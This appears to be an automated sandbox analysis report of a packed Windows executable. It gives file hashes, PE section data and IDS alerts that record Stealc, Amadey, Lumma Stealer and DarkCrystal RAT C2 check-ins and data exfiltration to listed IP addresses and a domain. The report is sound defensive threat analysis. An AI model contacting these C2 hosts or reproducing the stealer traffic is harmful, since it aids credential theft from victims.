SHA1:	FC9769D898ACDDA6AA2823156B6785F70320CDA1
SHA-256:	555083B7ACAFE7975AF7D62A55B67D82D7E8A90F3EB8ED7F0B9D77CD12C2B44E
SHA-512:	AF3DB664CB1D53FD5CAFEF1F7C4A04BB7990B7B1BD138FAA18AFFFDBF1C1D4924810ABA3A2FA5C0654550090D204D15DFF9F9EDB2FB6E9C7C622D9AF3711F6F4
Malicious:	false
Preview:	.....+..1..O.rGM...KF.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0.................5.@3P.........................

Chrome Cache Entry: 168

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2412)
Category:	downloaded
Size (bytes):	179299
Entropy (8bit):	5.547369532089825
Encrypted:	false
SSDEEP:	3072:eEBR1XAUw+9+in7oNRFhJpGOa9VMgoeSWInJ+LBIwK555ypuq/dP/JlpNMWzeAx+:eKR1tw+9+i7GFhJcOa/MgoeSWIJ+LBI/
MD5:	E51B78D04BF7FEADF2B7281088079FD5
SHA1:	47E0DCBBC95DA92A2B5E973C33200C3DD82E18A6
SHA-256:	7E8CC44AC8BED91DC83AF132CA1F374227C3A634F9020FFC66720C74A8DBAA53
SHA-512:	5377F671601862CBB506C1B33AA5F5ACAC2C451998C8A1A8E8C6754D2D11C96484483C081FB3A0407BAF1329D70F41ADE5CAB27993B6FA631384243BFC890813
Malicious:	false
URL:	"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.b6tg1FFzATM.2019.O/rt=j/m=q_d,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTv_QWZGpfkLjSgGX6lavnloO0T86g"
Preview:	this.gbar_=this.gbar_\|\|{};(function(_){var window=this;.try{._.Yi=function(a){if(4&a)return 4096&a?4096:8192&a?8192:0};_.Zi=class extends _.Q{constructor(){super()}};.}catch(e){_._DumpException(e)}.try{.var $i,aj,ej,hj,gj,cj,fj;$i=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};aj=function(){_.Na()};ej=function(a,b){(_.bj\|\|(_.bj=new cj)).set(a,b);(_.dj\|\|(_.dj=new cj)).set(b,a)};hj=function(a){if(fj===void 0){const b=new gj([],{});fj=Array.prototype.concat.call([],b).length===1}fj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.ij=function(a,b,c){a=_.tb(a,b,c);return Array.isArray(a)?a:_.Fc};._.jj=function(a,b){a=(2&b?a\|2:a&-3)\|32;return a&=-2049};_.kj=function(a,b){a===0&&(a=_.jj(a,b));return a\|1};_.lj=function(a){return!!(2&a)&&!!(4&a)\|\|!!(2048&a)};_.mj=function(a,b,c){32&b&&c\|\|(a&=-33);return a};._.pj=function(a,b,c,d,e,f,g){a=a.ha;var h=!!(2&b);e=h?1:e;f=!!f;g&&(g=!h);h=_.ij(a,b,d);var k=h[_

Chrome Cache Entry: 169

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (7542)
Category:	downloaded
Size (bytes):	7547
Entropy (8bit):	5.76983201321122
Encrypted:	false
SSDEEP:	192:DdpAvLFd66666/zF6SsOrtnFd66666PSyhXJGCVpBN6666VjIjdOPajJc:R2v/66666yWtj66666ayhX0CVpL6666/
MD5:	727650B7BEB2EE441E4614F82A199728
SHA1:	B3C5889EBBEC902CC5FDE3C92E3DC4382F5B46DD
SHA-256:	7A3370A653DFD235BC1F41AC71C3B588369AB70289B388088F1C78DA366A84C6
SHA-512:	CDD3AF035ED8196E6D941F8E56BE8249CBB6C5606A7419D777788584325CA3FDD04E88052B57D6A916392F5B839C1DFD9A9100558BB0E1D5FA76D2D869C05611
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["great circle indiana user","abu dhabi grand prix","pope francis","epic games fortnite wrapped","hilton honors delta status match","spacex starlink launch cape canaveral","jacob trouba rangers trade","severance season 2 official trailer"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"google:entityinfo":"Cg0vZy8xMWtxcTUwM3JtEgxDb25zb2xlIGdhbWUy1wpkYXRhOmltYWdlL2pwZWc7YmFzZTY0LC85ai80QUFRU2taSlJnQUJBUUFBQVFBQkFBRC8yd0NFQUFrR0J3Z0hCZ2tJQndnS0Nna0xEUllQRFF3TURSc1VGUkFXSUIwaUlpQWRIeDhrS0RRc0pDWXhKeDhmTFQwdE1UVTNPam82SXlzL1JEODRRelE1T2pjQkNnb0tEUXdOR2c4UEdqY2xIeVUzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM04vL0FBQkVJQUJRQVFBTUJJZ0FDRVFFREVRSC94QUFiQUFBREFRQURBUUFBQUFBQUFBQUFBQUFBQkFZQ0F3VUhBZi9FQUM0UUFBSUJBZ1VDQlFFSkFBQUFBQUFBQUFFQ0F3UVJBQVVTRXlFR01SUWlRVkZoa1FjVkl6TkNjWUhSNGYvRUFCa0JBQU1BQXdBQUFBQUFBQUFBQUFBQUFBQUNCQUVE

Chrome Cache Entry: 170

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:VQAOx/1n:VQAOd1n
MD5:	6FED308183D5DFC421602548615204AF
SHA1:	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
SHA-256:	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
SHA-512:	A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
Malicious:	false
URL:	https://www.google.com/async/newtab_promos
Preview:	)]}'.{"update":{"promos":{}}}

Chrome Cache Entry: 171

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65531)
Category:	downloaded
Size (bytes):	134268
Entropy (8bit):	5.441733802712494
Encrypted:	false
SSDEEP:	3072:fSkX33ov7GsG688fJbk/5xnsaLWjwR2i6o:fV3lr6t2/5xnsaawR8o
MD5:	B194894CD8523600E385E2F53CE27BDC
SHA1:	B35407EF849D0093441D9A865BA8CCE7DF9C9A04
SHA-256:	C9695B3A8CC4FEECE9AD197D393F96265AF0FA83B11C9DD25B5B0B58494E099C
SHA-512:	EE6A00243FBCB0268866934D8302CE3FD0A75B87C39C0C8E5F486565DA867AB0CB2944BB4A8D5201CBE775126B6A3262AE35243597FF39D3A0FC51A7E216ABF1
Malicious:	false
URL:	https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Preview:	)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

Chrome Cache Entry: 172

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (5162), with no line terminators
Category:	downloaded
Size (bytes):	5162
Entropy (8bit):	5.3503139230837595
Encrypted:	false
SSDEEP:	96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
MD5:	7977D5A9F0D7D67DE08DECF635B4B519
SHA1:	4A66E5FC1143241897F407CEB5C08C36767726C1
SHA-256:	FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
SHA-512:	8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
Malicious:	false
URL:	"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
Preview:	.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

Chrome Cache Entry: 173

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1660
Entropy (8bit):	4.301517070642596
Encrypted:	false
SSDEEP:	48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
MD5:	554640F465EB3ED903B543DAE0A1BCAC
SHA1:	E0E6E2C8939008217EB76A3B3282CA75F3DC401A
SHA-256:	99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
SHA-512:	462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
Malicious:	false
URL:	https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

\Device\Null

Download File

Process:	C:\Windows\System32\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	502
Entropy (8bit):	4.620893014805518
Encrypted:	false
SSDEEP:	12:PhD5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:5VdUOAokItULVDv
MD5:	5465CDA0E1970E90328BFBAFDA0986BC
SHA1:	5485141FFB2D8CEFD907D23951BE3B69D1BEB19D
SHA-256:	DAD866D8BB9B6DEDA8F836624CD7636B18F22D3F8BDA7EEF76A8B64685EF452C
SHA-512:	8FC2B14988DD8C62C301F4E994B979969FD09EF96C267CF0AE238E60BA775681754107D298716D386D6C1C25011192D87CA8F3845465323D2653EEB96A282A7F
Malicious:	false
Preview:	..Pinging 506407 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.944492891707347
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'806'336 bytes
MD5:	807928c7c8d81bf2c9f4ab5ba2f4763b
SHA1:	c48a08c824e5e273297c333c8e5b1e766f2ba8c2
SHA256:	2a3bba0c74c6ecab8ab9e722a3d2c19866d930c7f79a732ad6a0d24378a6836c
SHA512:	1496151d3615e25e9a8d8cac8ef62fa18ab0d3b1c6d366b7683a4a7b4b65296abb31a2675fbebb23dac2227fb21bcb1886500c566b617fd0c40d34d74ae0918f
SSDEEP:	49152:lhlvBjgj6YHUv4NTwra7Z21TU2VeZenXW1:pBjxSUgNTwroMrV41
TLSH:	EF8533531F3FFF67EF0DC8785449C1AE705C2969A84420F981995D640E3BDE28A92CBE
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d...d...d.....s.\|.....F.i.....r.^...m.[.g...m.K.b.......g...d.........w.w.....E.e...Richd...........PE..L....dTg...........

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0xa90000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67546419 [Sat Dec 7 15:04:57 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F8C7C80C6EAh
movd mm3, dword ptr [ebx]
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [esi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], bl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], cl
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x24b04d	0x61	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x24a000	0x1ac	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x24b1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x249000	0x16800	0e6356df3ad986878f7d1105cde4465f	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x24a000	0x1ac	0x200	d62043a0fc7a21493eaa519410782361	False	0.5859375	data	4.541392078148798	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x24b000	0x1000	0x200	0d0399d83a742d5d86c5718841e8e842	False	0.134765625	data	0.8646718654202081	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x24c000	0x2a4000	0x200	e1ab3825ef305a9096a795d65e2809a0	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ykpsajjh	0x4f0000	0x19f000	0x19ea00	a9ec4d969395138e423990a8173501fa	False	0.994732980667772	data	7.953200538195439	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
lvskadyv	0x68f000	0x1000	0x600	95135a5b08d5c1099228b51945805748	False	0.548828125	data	4.811941419790947	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x690000	0x3000	0x2200	248b2486bcb7327f3a5de4846753a3f3	False	0.07295496323529412	DOS executable (COM)	0.7654116481380225	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x68e708	0x152	ASCII text, with CRLF line terminators			0.6479289940828402

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-08T19:52:03.930341+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	49730	185.215.113.206	80	TCP
2024-12-08T19:52:04.418613+0100	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.4	49730	185.215.113.206	80	TCP
2024-12-08T19:52:04.552274+0100	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.206	80	192.168.2.4	49730	TCP
2024-12-08T19:52:04.872669+0100	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.4	49730	185.215.113.206	80	TCP
2024-12-08T19:52:05.001349+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.206	80	192.168.2.4	49730	TCP
2024-12-08T19:52:06.429911+0100	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.4	49730	185.215.113.206	80	TCP
2024-12-08T19:52:07.142481+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.206	80	TCP
2024-12-08T19:52:23.380994+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49748	185.215.113.206	80	TCP
2024-12-08T19:52:25.261965+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49748	185.215.113.206	80	TCP
2024-12-08T19:52:26.557010+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49748	185.215.113.206	80	TCP
2024-12-08T19:52:27.669684+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49748	185.215.113.206	80	TCP
2024-12-08T19:52:31.225809+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49748	185.215.113.206	80	TCP
2024-12-08T19:52:32.322231+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49748	185.215.113.206	80	TCP
2024-12-08T19:52:37.537276+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49757	185.215.113.16	80	TCP
2024-12-08T19:53:05.882467+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.4	49766	185.215.113.43	80	TCP
2024-12-08T19:53:10.479303+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49778	31.41.244.11	80	TCP
2024-12-08T19:53:19.657773+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.4	49772	TCP
2024-12-08T19:53:21.079754+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49804	185.215.113.43	80	TCP
2024-12-08T19:53:22.598235+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49805	31.41.244.11	80	TCP
2024-12-08T19:53:30.272402+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49826	185.215.113.43	80	TCP
2024-12-08T19:53:31.888074+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49828	31.41.244.11	80	TCP
2024-12-08T19:53:35.134823+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49838	185.215.113.43	80	TCP
2024-12-08T19:53:36.003207+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49839	77.73.39.158	80	TCP
2024-12-08T19:53:36.606363+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49842	185.215.113.16	80	TCP
2024-12-08T19:53:41.298141+0100	2057921	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz)	1	192.168.2.4	53951	1.1.1.1	53	UDP
2024-12-08T19:53:41.464682+0100	2048130	ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST)	1	192.168.2.4	49855	77.73.39.158	80	TCP
2024-12-08T19:53:42.663588+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49862	104.21.16.9	443	TCP
2024-12-08T19:53:42.663588+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49862	104.21.16.9	443	TCP
2024-12-08T19:53:43.373352+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49862	104.21.16.9	443	TCP
2024-12-08T19:53:43.373352+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49862	104.21.16.9	443	TCP
2024-12-08T19:53:43.783903+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49863	185.215.113.43	80	TCP
2024-12-08T19:53:45.033067+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49870	104.21.16.9	443	TCP
2024-12-08T19:53:45.033067+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49870	104.21.16.9	443	TCP
2024-12-08T19:53:45.284647+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49871	185.215.113.16	80	TCP
2024-12-08T19:53:45.857098+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49870	104.21.16.9	443	TCP
2024-12-08T19:53:45.857098+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49870	104.21.16.9	443	TCP
2024-12-08T19:53:47.899378+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49880	104.21.16.9	443	TCP
2024-12-08T19:53:47.899378+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49880	104.21.16.9	443	TCP
2024-12-08T19:53:50.886858+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.4	49893	104.21.16.9	443	TCP
2024-12-08T19:53:50.886858+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49893	104.21.16.9	443	TCP
